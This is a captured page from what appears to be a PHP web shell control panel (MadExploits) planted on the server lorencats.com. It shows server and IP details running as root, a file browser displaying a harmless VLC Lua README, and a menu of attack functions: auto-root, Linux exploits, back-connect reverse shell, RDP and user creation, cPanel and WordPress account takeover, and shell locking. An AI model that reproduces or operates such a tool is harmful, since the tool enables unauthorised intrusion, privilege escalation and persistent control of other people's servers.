Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
vlc /
lua /
intf /
[ HOME SHELL ]
Name
Size
Permission
Action
README.txt
730
B
-rw-r--r--
dumpmeta.lua
2.07
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.txt
Instructions to code your own VLC Lua interface script. See lua/README.txt for generic documentation about Lua usage in VLC. Examples: cli.lua, http.lua The "config" global variable is set to the value specified in the --lua-config VLC option. For example: --lua-config "rc={a='test',c=3},telnet={a='hello'}" config will be set to {a='test',c=3} in the rc interface, to {a='hello'} in the telnet interface and won't be set in other interfaces. User defined modules stored in the share/lua/intf/modules/ directory are available. For example, to use the sandbox module, just use 'require "sandbox"' in your interface. VLC defines a global vlc object with the following members: All the VLC specific Lua modules are available.
Close